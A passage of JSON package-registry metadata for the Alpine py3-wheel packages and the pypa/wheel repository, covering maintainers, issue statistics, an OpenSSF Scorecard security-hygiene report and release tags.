analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[]},"repo_metadata_updated_at":"2025-10-30T04:12:26.838Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-wheel-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.22","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-pyc/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-wheel-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-wheel-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-wheel-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-wheel-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-wheel-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages/py3-wheel-pyc/codemeta","maintainers":[{"uuid":"santurysim@gmail.com","login":null,"name":"Peter Shkenev","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","packages_count":106,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","role":null,"created_at":"2025-06-08T03:28:42.072Z","updated_at":"2025-06-08T03:28:42.072Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/maintainers/santurysim@gmail.com/packages"}],"registry":{"name":"alpine-v3.22","url":"https://pkgs.alpinelinux.org/packages?branch=v3.22","ecosystem":"alpine","default":false,"packages_count":26322,"maintainers_count":422,"namespaces_count":2,"keywords_count":4641,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1728},"icon_url":"https://github.com/alpinelinux.png","created_at":"2025-06-05T10:49:56.987Z","updated_at":"2026-06-10T05:18:29.151Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.22/namespaces"}},{"id":12992987,"name":"py3-wheel","ecosystem":"alpine","description":"built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":2,"first_release_published_at":"2025-05-05T11:24:02.000Z","latest_release_published_at":"2026-03-03T23:09:10.000Z","latest_release_number":"0.46.3-r0","last_synced_at":"2026-03-09T00:05:18.421Z","created_at":"2026-01-30T19:34:02.320Z","updated_at":"2026-03-09T00:05:18.421Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.23/main/x86_64/py3-wheel","install_command":"apk add py3-wheel","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{},"repo_metadata_updated_at":null,"dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-wheel?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.23","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-wheel/codemeta","maintainers":[{"uuid":"santurysim@gmail.com","login":null,"name":"Peter Shkenev","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","packages_count":107,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","role":null,"created_at":"2026-03-03T23:19:35.968Z","updated_at":"2026-03-03T23:19:35.968Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/maintainers/santurysim@gmail.com/packages"}],"registry":{"name":"alpine-v3.23","url":"https://pkgs.alpinelinux.org/packages?branch=v3.23","ecosystem":"alpine","default":false,"packages_count":27574,"maintainers_count":428,"namespaces_count":2,"keywords_count":181,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":104},"icon_url":"https://github.com/alpinelinux.png","created_at":"2026-01-24T14:35:50.739Z","updated_at":"2026-06-10T05:17:06.512Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/namespaces"}},{"id":6152668,"name":"py3-wheel","ecosystem":"alpine","description":"built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2021-04-05T18:18:10.000Z","latest_release_published_at":"2021-04-05T18:18:10.000Z","latest_release_number":"0.36.2-r2","last_synced_at":"2026-04-01T13:25:13.890Z","created_at":"2023-01-31T23:27:19.155Z","updated_at":"2026-04-01T13:25:13.891Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.15/main/x86_64/py3-wheel","install_command":"apk add py3-wheel","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH